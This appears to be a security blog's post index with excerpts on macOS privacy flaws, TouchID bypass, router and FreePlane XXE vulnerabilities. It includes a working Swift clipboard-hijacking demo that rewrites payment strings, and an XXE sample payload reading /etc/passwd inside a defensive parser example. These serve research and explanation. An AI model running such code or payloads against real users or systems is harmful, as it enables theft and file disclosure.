All Posts

Dissecting Logitech Options on macOS

Some time ago, I bought a Logitech MX Master wireless mouse to use with my Macs. And here the story begins… Since this mouse has extra buttons, I wanted to assign my own custom actions to them. As I read in the Logitech docs, I had to download a driver called “Logitech Options”. So I did! Kudos: First of all, I want to thank @Disconnect3d for helping me with the reversing part. The second kudos belongs to @Taviso, who discovered a similar issue on Windows at the same time and reported it to the Logitech team.

Sandboxed malware may control your pasteboard

TL;DR: The sandbox implemented in macOS does not cover the pasteboard. This post shows that you can create fully sandboxed malware (which may pass Apple’s review, bypassed many times in the past) that steals and modifies pasteboard values. What is the sandbox? App Sandbox is an access control technology provided in macOS, enforced at the kernel level. It is designed to contain damage to the system and the user’s data if an app becomes compromised.
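To make the point concrete, here is an added example (mine, not code from the original post): a minimal macOS command-line tool that watches the general pasteboard and can overwrite it. Nothing in it requires an entitlement beyond `com.apple.security.app-sandbox`; every call below is permitted inside the sandbox, which is exactly the gap the post describes. The file names, the build and signing commands in the comments, and the "replace whatever looks interesting" logic are my assumptions for illustration.

```swift
// Added example, not from the original post.
// Build:   swiftc watcher.swift -o watcher
// Sandbox: codesign -s - --entitlements sandbox.entitlements watcher
// sandbox.entitlements (assumed file name) holds a single key:
//   com.apple.security.app-sandbox = true
// No pasteboard-related entitlement exists, so none is needed.
import AppKit

/// Polls the general pasteboard and reports every change made by any app.
final class PasteboardWatcher {
    private let pasteboard = NSPasteboard.general
    private var lastChangeCount: Int

    init() {
        lastChangeCount = pasteboard.changeCount
    }

    /// Returns the new string contents if the pasteboard changed since the last poll.
    func pollChange() -> String? {
        let count = pasteboard.changeCount   // bumped on every write, by any process
        guard count != lastChangeCount else { return nil }
        lastChangeCount = count
        return pasteboard.string(forType: .string)
    }

    /// The "modifying" half: take ownership of the pasteboard and overwrite it.
    func replace(with text: String) {
        pasteboard.clearContents()
        pasteboard.setString(text, forType: .string)
        lastChangeCount = pasteboard.changeCount  // don't report our own write
    }
}

let watcher = PasteboardWatcher()

// Poll twice a second; NSPasteboard has no change notification, so polling
// changeCount is the standard way to observe it.
Timer.scheduledTimer(withTimeInterval: 0.5, repeats: true) { _ in
    guard let text = watcher.pollChange() else { return }
    print("pasteboard now contains: \(text)")

    // Assumed trigger for the demo: anything that looks like a payment
    // reference gets swapped. Real malware would match wallet addresses or IBANs.
    if text.hasPrefix("PAY-") {
        watcher.replace(with: "PAY-ATTACKER")
        print("pasteboard rewritten")
    }
}
RunLoop.main.run()
```

Run it, copy the text `PAY-123` in any other app, and paste: the sandboxed tool has already swapped it. The mitigation side is on the user: nothing in the sandbox profile stops this, so sensitive values should not transit the pasteboard unattended.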

Your Signal messages can leak via locked screen on macOS

If you are a security-aware person, you probably use one of the secure messengers. 😏 And maybe, to improve your comfort, you installed its desktop version on your Mac? Sometimes we leave our computer unattended when we go to make a coffee or need to talk with somebody in the other room. Since we are security aware, we always lock our screens (you do that, right?). But what if all messages sent to you were visible on your locked Mac?

Clone your finger - bypassing TouchID

In this short blog post I will show you why an alphanumeric password is much more secure than biometrics. At home, as a total n00b, I was able to clone my finger and bypass TouchID. To be honest, in my case the effectiveness was about 10%-15%, but as I wrote before, it was my first time and I didn’t have any professional tools. Before I start, I want to credit Łukasz Bobrek & Paweł Kuryłowicz from SecuRing, who showed me their research.

My thoughts after AppSec EU

Hi dear readers! This year I attended my first OWASP AppSec EU, both as an attendee and as a speaker. I really enjoyed the conference, the community-driven presentations and the tracks (DevOps, Developer, CISO, Hacker). Because of my interests, I decided to follow the Hacker track. Man in contacts: The first presentation I attended at AppSec was “Man in contacts” by Jeremy Matos and Laureline David. The main idea was to create a malicious app that has access to your contacts (you actually grant the permission) and then all your contacts are exfiltrated to the malicious C&C.

Your encrypted photos revealed in macOS cache

Quicklook is a super cool mechanism allowing you to quickly check a file’s contents without opening it in a specialized application. When you press the space bar on, for instance, an *.xlsx file, you see the following preview without having MS Excel installed. While reading *OS Internals Volume I (which I highly recommend, btw), I stopped at the Quicklook chapter. I found out that Quicklook registers the com.apple.quicklook.ThumbnailsAgent XPC service, which is responsible for creating the thumbnails database and storing it in /var/folders/…/C/com.

Authenticated Code Execution in DASAN routers

Before I describe the details, you have to know that this post is published under Responsible Disclosure terms. I sent a full report with all the findings to DASAN on 24 October 2017. We discussed these vulnerabilities for a long time, and one day they simply stopped responding to me (even after I warned them that I wanted to disclose this). Today is 26 April 2018, so it’s over half a year since DASAN was informed.

Story about hacking security conference and their funny revenge

Not so long ago I submitted a presentation proposal to CONFidence’s Call For Papers. CONFidence is one of the best European IT security conferences, which I love to attend due to the very good presentation quality and hackish^H^H atmosphere ;-) This year I decided to attend actively as a speaker, with my presentation about pentesting iOS apps using a jailed iDevice. I sent my proposal, and when I received the approval, I visited the conference’s website to check whether I was really included in the speakers list (at SecuRing it’s common to prank your colleagues, for instance by sending emails from a fake server, haha).

'The biggest' *OS problem in 2018

It’s March 2018 as I write this post. Day by day, Apple’s security improves: we have Kernel Patch Protection, the Secure Enclave Processor (now even on macOS, with the Touch Bar), Gatekeeper and many other security features. On the other hand, in just the last half year some trivial bugs were found that led to password disclosure. It seems that password leaks may currently be the most serious *OS problem, at least from a PR perspective.

FreePlane <= 1.5.9 XXE

What is FreePlane? FreePlane is an open-source application for creating mind maps. Vulnerability description: FreePlane is a Java-based app that loads its mind maps, which are stored as simple XML files. The parser expanded external entities, which caused this vulnerability. Results: When the victim opens a maliciously crafted mind map, any file readable by the Java process can be sent to the attacker. Proof of concept: Malicious mindmap: <map version="freeplane 1.
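The fix for this class of bug is always the same: never let a document that has no business carrying a DTD declare entities, and never let the parser resolve external ones. FreePlane itself is Java (there the equivalent is disabling the `http://apache.org/xml/features/disallow-doctype-decl` and `http://xml.org/sax/features/external-general-entities` features on the factory), but to keep one language on this page here is an added example of the same check with Foundation’s `XMLParser`. This is my illustration, not FreePlane’s code; the two sample maps are constructed, and I assume mind-map node labels live in the `TEXT` attribute of `<node>` elements.

```swift
// Added example, not FreePlane's code: load a mind map and refuse any document
// that declares entities, so an external entity can never be expanded.
import Foundation

/// Result of loading a mind map: the node labels, or the reason it was rejected.
enum MapLoadResult {
    case ok(nodeTexts: [String])
    case rejected(String)
}

final class SafeMapParser: NSObject, XMLParserDelegate {
    private var texts: [String] = []
    private var rejection: String?

    func load(_ data: Data) -> MapLoadResult {
        texts = []
        rejection = nil
        let parser = XMLParser(data: data)
        parser.delegate = self
        // The dangerous knob. Keep it false (the default): with it set to true,
        // <!ENTITY x SYSTEM "file:///..."> is fetched and substituted into the document.
        parser.shouldResolveExternalEntities = false
        parser.parse()
        if let why = rejection { return .rejected(why) }
        if let err = parser.parserError { return .rejected(err.localizedDescription) }
        return .ok(nodeTexts: texts)
    }

    // A mind map never needs a DTD, so any entity declaration is grounds to stop.
    func parser(_ parser: XMLParser, foundExternalEntityDeclarationWithName name: String,
                publicID: String?, systemID: String?) {
        rejection = "external entity '\(name)' -> \(systemID ?? "?")"
        parser.abortParsing()
    }

    // Internal entities are rejected too: they are the building block of
    // entity-expansion ("billion laughs") denial of service.
    func parser(_ parser: XMLParser, foundInternalEntityDeclarationWithName name: String,
                value: String?) {
        rejection = "internal entity '\(name)'"
        parser.abortParsing()
    }

    func parser(_ parser: XMLParser, didStartElement elementName: String,
                namespaceURI: String?, qualifiedName qName: String?,
                attributes attributeDict: [String: String] = [:]) {
        // Assumed layout of the format: labels in the TEXT attribute of <node>.
        if elementName == "node", let text = attributeDict["TEXT"] {
            texts.append(text)
        }
    }
}

// Constructed inputs: a benign map, and one carrying a DTD with an external entity
// whose value would be pulled from the local file system if it were resolved.
let benign = """
<map version="freeplane 1.5.9"><node TEXT="root"><node TEXT="child"/></node></map>
"""
let hostile = """
<!DOCTYPE map [<!ENTITY x SYSTEM "file:///etc/passwd">]>
<map version="freeplane 1.5.9"><node TEXT="&x;"/></map>
"""

let loader = SafeMapParser()
print(loader.load(Data(benign.utf8)))
print(loader.load(Data(hostile.utf8)))
```

The benign map loads and yields its two labels; the hostile one is rejected at the entity declaration, before any element is parsed, which is the behaviour you want regardless of what the parser would otherwise do with the reference. Exfiltration in the real bug needs one more step (getting the expanded content out, typically through a second, parameter entity pointing at the attacker’s server), which is why blocking DTDs outright is simpler than reasoning about which entities are harmless.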